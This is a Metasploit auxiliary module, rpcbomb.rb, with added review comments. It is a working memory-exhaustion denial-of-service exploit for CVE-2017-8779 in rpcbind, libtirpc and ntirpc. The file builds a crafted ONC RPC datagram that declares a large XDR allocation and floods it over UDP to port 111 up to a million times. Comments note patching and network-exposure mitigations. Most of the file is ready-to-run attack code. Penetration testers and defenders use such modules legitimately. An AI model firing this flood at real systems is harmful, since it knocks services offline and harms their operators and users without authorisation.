
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/rpc/rpcbomb.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Dos
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::UDPScanner

  # Module metadata and user-settable options.
  #
  # This is a memory-exhaustion DoS against unpatched rpcbind/libtirpc/ntirpc
  # (CVE-2017-8779, referenced below). From the defender's side the fix is the
  # upstream patch for that CVE; exposure is further reduced by not leaving
  # rpcbind (UDP/111 by default) reachable from untrusted networks. The traffic
  # pattern is a burst of identical small UDP datagrams to RPORT from one
  # source, which rate-limiting or flow monitoring can surface.
  #
  # @param info [Hash] metadata overrides merged by +update_info+
  def initialize(info={})
    super(update_info(info,
      'Name' => 'RPC DoS targeting *nix rpcbind/libtirpc',
      'Description' => %q{
        This module exploits a vulnerability in certain versions of
        rpcbind, LIBTIRPC, and NTIRPC, allowing an attacker to trigger
        large (and never freed) memory allocations for XDR strings on
        the target.
      },
      'Author' =>
        [
          'guidovranken', # original code
          'Pearce Barry <pearce_barry[at]rapid7.com>' # Metasploit module
        ],
      'License' => MSF_LICENSE,
      'References' => [
        [ 'CVE', '2017-8779' ],
        [ 'BID', '98325' ],
        [ 'URL', 'http://openwall.com/lists/oss-security/2017/05/03/12' ]
      ],
      'Disclosure Date' => 'May 03 2017'))

    register_options([
      Opt::RPORT(111), # rpcbind / portmapper
      # Written into the last field of every datagram; per the Description the
      # vulnerable target allocates this many bytes per request and never frees them.
      OptInt.new('ALLOCSIZE', [true, 'Number of bytes to allocate', 1000000]),
      # Upper bound on datagrams sent to each host; scan_host also stops early
      # on the first send error.
      OptInt.new('COUNT', [false, "Number of intervals to loop", 1000000])
    ])
  end

  # Builds one ONC RPC CALL datagram and sends it to +ip+:RPORT up to COUNT
  # times. Invoked by the UDPScanner mixin once per target host.
  #
  # @param ip [String] target address supplied by the scanner mixin
  # @return [void] progress is reported through vprint_error / vprint_good
  def scan_host(ip)
    # Every field is packed as a big-endian unsigned 32-bit integer ('N*'),
    # the XDR encoding ONC RPC uses for its header and integer arguments.
    pkt = [
      0, # xid
      0, # message type CALL
      2, # RPC version 2
      100000, # Program (rpcbind / portmapper)
      4, # Program version
      9, # Procedure
      0, # Credentials AUTH_NULL
      0, # Credentials length 0
      0, # Verifier AUTH_NULL (same flavor/length pair as the credentials)
      0, # Verifier length 0
      0, # Program: 0
      0, # Ver
      4, # Proc
      4, # Argument length
      datastore['ALLOCSIZE'] # Payload: the declared XDR length the target allocates for
    ].pack('N*')

    # NOTE(review): the socket is never closed explicitly; presumably the
    # framework or GC reclaims it, but an +ensure s.close+ would make that explicit.
    s = udp_socket(ip, datastore['RPORT'])
    count = 0
    # NOTE(review): COUNT is registered as optional; the comparison below assumes
    # the datastore returns the Integer default when the option is unset — confirm.
    while count < datastore['COUNT'] do
      begin
        s.send(pkt, 0)
      rescue ::Errno::ENOBUFS, ::Rex::ConnectionError, ::Errno::ECONNREFUSED
        # Any of these send failures is reported as "unreachable" and ends the loop.
        vprint_error("Host #{ip} unreachable")
        break
      end
      count += 1
    end

    # count reflects datagrams actually sent, which is fewer than COUNT after an early break.
    vprint_good("Completed #{count} loop(s) of allocating #{datastore['ALLOCSIZE']} bytes on host #{ip}:#{datastore['RPORT']}")
  end
end